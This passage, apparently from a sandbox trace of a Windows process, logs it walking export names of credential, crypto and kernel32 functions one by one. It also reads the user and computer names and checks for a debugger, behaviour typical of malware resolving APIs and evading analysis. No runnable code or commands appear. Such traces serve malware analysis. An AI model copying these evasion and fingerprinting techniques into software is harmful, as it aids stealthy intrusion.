lpString1="CredRenameW") returned="CredRenameW" [0158.308] lstrlenA (lpString="CREDRENAMEW") returned 11 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredRestoreCredentials" | out: lpString1="CredRestoreCredentials") returned="CredRestoreCredentials" [0158.308] lstrlenA (lpString="CREDRESTORECREDENTIALS") returned 22 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredUnmarshalCredentialA" | out: lpString1="CredUnmarshalCredentialA") returned="CredUnmarshalCredentialA" [0158.308] lstrlenA (lpString="CREDUNMARSHALCREDENTIALA") returned 24 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredUnmarshalCredentialW" | out: lpString1="CredUnmarshalCredentialW") returned="CredUnmarshalCredentialW" [0158.308] lstrlenA (lpString="CREDUNMARSHALCREDENTIALW") returned 24 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredUnprotectA" | out: lpString1="CredUnprotectA") returned="CredUnprotectA" [0158.308] lstrlenA (lpString="CREDUNPROTECTA") returned 14 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredUnprotectW" | out: lpString1="CredUnprotectW") returned="CredUnprotectW" [0158.308] lstrlenA (lpString="CREDUNPROTECTW") returned 14 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredWriteA" | out: lpString1="CredWriteA") returned="CredWriteA" [0158.308] lstrlenA (lpString="CREDWRITEA") returned 10 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredWriteDomainCredentialsA" | out: lpString1="CredWriteDomainCredentialsA") returned="CredWriteDomainCredentialsA" [0158.308] lstrlenA (lpString="CREDWRITEDOMAINCREDENTIALSA") returned 27 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredWriteDomainCredentialsW" | out: lpString1="CredWriteDomainCredentialsW") returned="CredWriteDomainCredentialsW" [0158.308] lstrlenA (lpString="CREDWRITEDOMAINCREDENTIALSW") returned 27 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredWriteW" | out: lpString1="CredWriteW") returned="CredWriteW" [0158.308] lstrlenA (lpString="CREDWRITEW") returned 10 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredpConvertCredential" | out: lpString1="CredpConvertCredential") returned="CredpConvertCredential" [0158.308] lstrlenA (lpString="CREDPCONVERTCREDENTIAL") returned 22 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredpConvertOneCredentialSize" | out: lpString1="CredpConvertOneCredentialSize") returned="CredpConvertOneCredentialSize" [0158.308] lstrlenA (lpString="CREDPCONVERTONECREDENTIALSIZE") returned 29 [0158.308] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredpConvertTargetInfo" | out: lpString1="CredpConvertTargetInfo") returned="CredpConvertTargetInfo" [0158.309] lstrlenA (lpString="CREDPCONVERTTARGETINFO") returned 22 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredpDecodeCredential" | out: lpString1="CredpDecodeCredential") returned="CredpDecodeCredential" [0158.309] lstrlenA (lpString="CREDPDECODECREDENTIAL") returned 21 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredpEncodeCredential" | out: lpString1="CredpEncodeCredential") returned="CredpEncodeCredential" [0158.309] lstrlenA (lpString="CREDPENCODECREDENTIAL") returned 21 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CredpEncodeSecret" | out: lpString1="CredpEncodeSecret") returned="CredpEncodeSecret" [0158.309] lstrlenA (lpString="CREDPENCODESECRET") returned 17 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptAcquireContextA" | out: lpString1="CryptAcquireContextA") returned="CryptAcquireContextA" [0158.309] lstrlenA (lpString="CRYPTACQUIRECONTEXTA") returned 20 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptAcquireContextW" | out: lpString1="CryptAcquireContextW") returned="CryptAcquireContextW" [0158.309] lstrlenA (lpString="CRYPTACQUIRECONTEXTW") returned 20 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptContextAddRef" | out: lpString1="CryptContextAddRef") returned="CryptContextAddRef" [0158.309] lstrlenA (lpString="CRYPTCONTEXTADDREF") returned 18 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptCreateHash" | out: lpString1="CryptCreateHash") returned="CryptCreateHash" [0158.309] lstrlenA (lpString="CRYPTCREATEHASH") returned 15 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptDecrypt" | out: lpString1="CryptDecrypt") returned="CryptDecrypt" [0158.309] lstrlenA (lpString="CRYPTDECRYPT") returned 12 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptDeriveKey" | out: lpString1="CryptDeriveKey") returned="CryptDeriveKey" [0158.309] lstrlenA (lpString="CRYPTDERIVEKEY") returned 14 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptDestroyHash" | out: lpString1="CryptDestroyHash") returned="CryptDestroyHash" [0158.309] lstrlenA (lpString="CRYPTDESTROYHASH") returned 16 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptDestroyKey" | out: lpString1="CryptDestroyKey") returned="CryptDestroyKey" [0158.309] lstrlenA (lpString="CRYPTDESTROYKEY") returned 15 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptDuplicateHash" | out: lpString1="CryptDuplicateHash") returned="CryptDuplicateHash" [0158.309] lstrlenA (lpString="CRYPTDUPLICATEHASH") returned 18 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptDuplicateKey" | out: lpString1="CryptDuplicateKey") returned="CryptDuplicateKey" [0158.309] lstrlenA (lpString="CRYPTDUPLICATEKEY") returned 17 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptEncrypt" | out: lpString1="CryptEncrypt") returned="CryptEncrypt" [0158.309] lstrlenA (lpString="CRYPTENCRYPT") returned 12 [0158.309] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptEnumProviderTypesA" | out: lpString1="CryptEnumProviderTypesA") returned="CryptEnumProviderTypesA" [0158.309] lstrlenA (lpString="CRYPTENUMPROVIDERTYPESA") returned 23 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptEnumProviderTypesW" | out: lpString1="CryptEnumProviderTypesW") returned="CryptEnumProviderTypesW" [0158.310] lstrlenA (lpString="CRYPTENUMPROVIDERTYPESW") returned 23 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptEnumProvidersA" | out: lpString1="CryptEnumProvidersA") returned="CryptEnumProvidersA" [0158.310] lstrlenA (lpString="CRYPTENUMPROVIDERSA") returned 19 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptEnumProvidersW" | out: lpString1="CryptEnumProvidersW") returned="CryptEnumProvidersW" [0158.310] lstrlenA (lpString="CRYPTENUMPROVIDERSW") returned 19 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptExportKey" | out: lpString1="CryptExportKey") returned="CryptExportKey" [0158.310] lstrlenA (lpString="CRYPTEXPORTKEY") returned 14 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptGenKey" | out: lpString1="CryptGenKey") returned="CryptGenKey" [0158.310] lstrlenA (lpString="CRYPTGENKEY") returned 11 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptGenRandom" | out: lpString1="CryptGenRandom") returned="CryptGenRandom" [0158.310] lstrlenA (lpString="CRYPTGENRANDOM") returned 14 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptGetDefaultProviderA" | out: lpString1="CryptGetDefaultProviderA") returned="CryptGetDefaultProviderA" [0158.310] lstrlenA (lpString="CRYPTGETDEFAULTPROVIDERA") returned 24 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptGetDefaultProviderW" | out: lpString1="CryptGetDefaultProviderW") returned="CryptGetDefaultProviderW" [0158.310] lstrlenA (lpString="CRYPTGETDEFAULTPROVIDERW") returned 24 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptGetHashParam" | out: lpString1="CryptGetHashParam") returned="CryptGetHashParam" [0158.310] lstrlenA (lpString="CRYPTGETHASHPARAM") returned 17 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptGetKeyParam" | out: lpString1="CryptGetKeyParam") returned="CryptGetKeyParam" [0158.310] lstrlenA (lpString="CRYPTGETKEYPARAM") returned 16 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptGetProvParam" | out: lpString1="CryptGetProvParam") returned="CryptGetProvParam" [0158.310] lstrlenA (lpString="CRYPTGETPROVPARAM") returned 17 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptGetUserKey" | out: lpString1="CryptGetUserKey") returned="CryptGetUserKey" [0158.310] lstrlenA (lpString="CRYPTGETUSERKEY") returned 15 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptHashData" | out: lpString1="CryptHashData") returned="CryptHashData" [0158.310] lstrlenA (lpString="CRYPTHASHDATA") returned 13 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptHashSessionKey" | out: lpString1="CryptHashSessionKey") returned="CryptHashSessionKey" [0158.310] lstrlenA (lpString="CRYPTHASHSESSIONKEY") returned 19 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptImportKey" | out: lpString1="CryptImportKey") returned="CryptImportKey" [0158.310] lstrlenA (lpString="CRYPTIMPORTKEY") returned 14 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptReleaseContext" | out: lpString1="CryptReleaseContext") returned="CryptReleaseContext" [0158.310] lstrlenA (lpString="CRYPTRELEASECONTEXT") returned 19 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSetHashParam" | out: lpString1="CryptSetHashParam") returned="CryptSetHashParam" [0158.310] lstrlenA (lpString="CRYPTSETHASHPARAM") returned 17 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSetKeyParam" | out: lpString1="CryptSetKeyParam") returned="CryptSetKeyParam" [0158.310] lstrlenA (lpString="CRYPTSETKEYPARAM") returned 16 [0158.310] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSetProvParam" | out: lpString1="CryptSetProvParam") returned="CryptSetProvParam" [0158.310] lstrlenA (lpString="CRYPTSETPROVPARAM") returned 17 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSetProviderA" | out: lpString1="CryptSetProviderA") returned="CryptSetProviderA" [0158.311] lstrlenA (lpString="CRYPTSETPROVIDERA") returned 17 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSetProviderExA" | out: lpString1="CryptSetProviderExA") returned="CryptSetProviderExA" [0158.311] lstrlenA (lpString="CRYPTSETPROVIDEREXA") returned 19 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSetProviderExW" | out: lpString1="CryptSetProviderExW") returned="CryptSetProviderExW" [0158.311] lstrlenA (lpString="CRYPTSETPROVIDEREXW") returned 19 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSetProviderW" | out: lpString1="CryptSetProviderW") returned="CryptSetProviderW" [0158.311] lstrlenA (lpString="CRYPTSETPROVIDERW") returned 17 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSignHashA" | out: lpString1="CryptSignHashA") returned="CryptSignHashA" [0158.311] lstrlenA (lpString="CRYPTSIGNHASHA") returned 14 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptSignHashW" | out: lpString1="CryptSignHashW") returned="CryptSignHashW" [0158.311] lstrlenA (lpString="CRYPTSIGNHASHW") returned 14 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptVerifySignatureA" | out: lpString1="CryptVerifySignatureA") returned="CryptVerifySignatureA" [0158.311] lstrlenA (lpString="CRYPTVERIFYSIGNATUREA") returned 21 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="CryptVerifySignatureW" | out: lpString1="CryptVerifySignatureW") returned="CryptVerifySignatureW" [0158.311] lstrlenA (lpString="CRYPTVERIFYSIGNATUREW") returned 21 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DecryptFileA" | out: lpString1="DecryptFileA") returned="DecryptFileA" [0158.311] lstrlenA (lpString="DECRYPTFILEA") returned 12 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DecryptFileW" | out: lpString1="DecryptFileW") returned="DecryptFileW" [0158.311] lstrlenA (lpString="DECRYPTFILEW") returned 12 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteAce" | out: lpString1="DeleteAce") returned="DeleteAce" [0158.311] lstrlenA (lpString="DELETEACE") returned 9 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeleteService" | out: lpString1="DeleteService") returned="DeleteService" [0158.311] lstrlenA (lpString="DELETESERVICE") returned 13 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DeregisterEventSource" | out: lpString1="DeregisterEventSource") returned="DeregisterEventSource" [0158.311] lstrlenA (lpString="DEREGISTEREVENTSOURCE") returned 21 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DestroyPrivateObjectSecurity" | out: lpString1="DestroyPrivateObjectSecurity") returned="DestroyPrivateObjectSecurity" [0158.311] lstrlenA (lpString="DESTROYPRIVATEOBJECTSECURITY") returned 28 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DuplicateEncryptionInfoFile" | out: lpString1="DuplicateEncryptionInfoFile") returned="DuplicateEncryptionInfoFile" [0158.311] lstrlenA (lpString="DUPLICATEENCRYPTIONINFOFILE") returned 27 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DuplicateToken" | out: lpString1="DuplicateToken") returned="DuplicateToken" [0158.311] lstrlenA (lpString="DUPLICATETOKEN") returned 14 [0158.311] lstrcpyA (in: lpString1=0x239e35c, lpString2="DuplicateTokenEx" | out: lpString1="DuplicateTokenEx") returned="DuplicateTokenEx" [0158.312] lstrlenA (lpString="DUPLICATETOKENEX") returned 16 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfBackupEventLogFileA" | out: lpString1="ElfBackupEventLogFileA") returned="ElfBackupEventLogFileA" [0158.312] lstrlenA (lpString="ELFBACKUPEVENTLOGFILEA") returned 22 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfBackupEventLogFileW" | out: lpString1="ElfBackupEventLogFileW") returned="ElfBackupEventLogFileW" [0158.312] lstrlenA (lpString="ELFBACKUPEVENTLOGFILEW") returned 22 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfChangeNotify" | out: lpString1="ElfChangeNotify") returned="ElfChangeNotify" [0158.312] lstrlenA (lpString="ELFCHANGENOTIFY") returned 15 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfClearEventLogFileA" | out: lpString1="ElfClearEventLogFileA") returned="ElfClearEventLogFileA" [0158.312] lstrlenA (lpString="ELFCLEAREVENTLOGFILEA") returned 21 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfClearEventLogFileW" | out: lpString1="ElfClearEventLogFileW") returned="ElfClearEventLogFileW" [0158.312] lstrlenA (lpString="ELFCLEAREVENTLOGFILEW") returned 21 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfCloseEventLog" | out: lpString1="ElfCloseEventLog") returned="ElfCloseEventLog" [0158.312] lstrlenA (lpString="ELFCLOSEEVENTLOG") returned 16 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfDeregisterEventSource" | out: lpString1="ElfDeregisterEventSource") returned="ElfDeregisterEventSource" [0158.312] lstrlenA (lpString="ELFDEREGISTEREVENTSOURCE") returned 24 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfFlushEventLog" | out: lpString1="ElfFlushEventLog") returned="ElfFlushEventLog" [0158.312] lstrlenA (lpString="ELFFLUSHEVENTLOG") returned 16 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfNumberOfRecords" | out: lpString1="ElfNumberOfRecords") returned="ElfNumberOfRecords" [0158.312] lstrlenA (lpString="ELFNUMBEROFRECORDS") returned 18 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfOldestRecord" | out: lpString1="ElfOldestRecord") returned="ElfOldestRecord" [0158.312] lstrlenA (lpString="ELFOLDESTRECORD") returned 15 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfOpenBackupEventLogA" | out: lpString1="ElfOpenBackupEventLogA") returned="ElfOpenBackupEventLogA" [0158.312] lstrlenA (lpString="ELFOPENBACKUPEVENTLOGA") returned 22 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfOpenBackupEventLogW" | out: lpString1="ElfOpenBackupEventLogW") returned="ElfOpenBackupEventLogW" [0158.312] lstrlenA (lpString="ELFOPENBACKUPEVENTLOGW") returned 22 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfOpenEventLogA" | out: lpString1="ElfOpenEventLogA") returned="ElfOpenEventLogA" [0158.312] lstrlenA (lpString="ELFOPENEVENTLOGA") returned 16 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfOpenEventLogW" | out: lpString1="ElfOpenEventLogW") returned="ElfOpenEventLogW" [0158.312] lstrlenA (lpString="ELFOPENEVENTLOGW") returned 16 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfReadEventLogA" | out: lpString1="ElfReadEventLogA") returned="ElfReadEventLogA" [0158.312] lstrlenA (lpString="ELFREADEVENTLOGA") returned 16 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfReadEventLogW" | out: lpString1="ElfReadEventLogW") returned="ElfReadEventLogW" [0158.312] lstrlenA (lpString="ELFREADEVENTLOGW") returned 16 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfRegisterEventSourceA" | out: lpString1="ElfRegisterEventSourceA") returned="ElfRegisterEventSourceA" [0158.312] lstrlenA (lpString="ELFREGISTEREVENTSOURCEA") returned 23 [0158.312] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfRegisterEventSourceW" | out: lpString1="ElfRegisterEventSourceW") returned="ElfRegisterEventSourceW" [0158.312] lstrlenA (lpString="ELFREGISTEREVENTSOURCEW") returned 23 [0158.313] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfReportEventA" | out: lpString1="ElfReportEventA") returned="ElfReportEventA" [0158.313] lstrlenA (lpString="ELFREPORTEVENTA") returned 15 [0158.313] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfReportEventAndSourceW" | out: lpString1="ElfReportEventAndSourceW") returned="ElfReportEventAndSourceW" [0158.313] lstrlenA (lpString="ELFREPORTEVENTANDSOURCEW") returned 24 [0158.313] lstrcpyA (in: lpString1=0x239e35c, lpString2="ElfReportEventW" | out: lpString1="ElfReportEventW") returned="ElfReportEventW" [0158.313] lstrlenA (lpString="ELFREPORTEVENTW") returned 15 [0158.313] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnableTrace" | out: lpString1="EnableTrace") returned="EnableTrace" [0158.313] lstrlenA (lpString="ENABLETRACE") returned 11 [0158.313] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnableTraceEx" | out: lpString1="EnableTraceEx") returned="EnableTraceEx" [0158.313] lstrlenA (lpString="ENABLETRACEEX") returned 13 [0158.313] lstrcpyA (in: lpString1=0x239e35c, lpString2="EnableTraceEx2" | out: lpString1="EnableTraceEx2") returned="EnableTraceEx2" [0158.313] lstrlenA (lpString="ENABLETRACEEX2") returned 14 [0158.313] lstrcpyA (in: lpString1=0x239e35c, lpString2="EncryptFileA" | out: lpString1="EncryptFileA") returned="EncryptFileA" [0158.313] GetUserNameW (in: lpBuffer=0x170000, pcbBuffer=0x239f198 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x239f198) returned 1 [0158.316] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x180000 [0158.316] GetComputerNameW (in: lpBuffer=0x180000, nSize=0x239f198 | out: lpBuffer="XDUWTFONO", nSize=0x239f198) returned 1 [0158.316] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x190000 [0158.317] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1a0000 [0158.317] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x1b0000 [0158.318] IsDebuggerPresent () returned 0 [0158.318] lstrlenA (lpString="kernel32.dll") returned 12 [0158.318] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0158.318] lstrcpyA (in: lpString1=0x239e320, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0158.318] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0158.318] lstrcpyA (in: lpString1=0x239e320, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0158.319] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0158.319] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0158.319] lstrlenA (lpString="ADDATOMA") returned 8 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0158.319] lstrlenA (lpString="ADDATOMW") returned 8 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0158.319] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0158.319] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0158.319] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0158.319] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0158.319] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0158.319] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0158.319] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0158.319] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0158.319] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0158.319] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0158.319] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0158.319] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0158.319] lstrcpyA (in: lpString1=0x239e320, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0158.319] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0158.320] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0158.320] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0158.320] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0158.320] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0158.320] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0158.320] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0158.320] lstrlenA (lpString="BACKUPREAD") returned 10 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0158.320] lstrlenA (lpString="BACKUPSEEK") returned 10 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0158.320] lstrlenA (lpString="BACKUPWRITE") returned 11 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0158.320] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0158.320] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0158.320] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0158.320] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0158.320] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0158.320] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0158.320] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0158.320] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0158.321] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0158.321] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0158.321] lstrcpyA (in: lpString1=0x239e320, lpString2="BaseGenerateAppCompatData" | out: 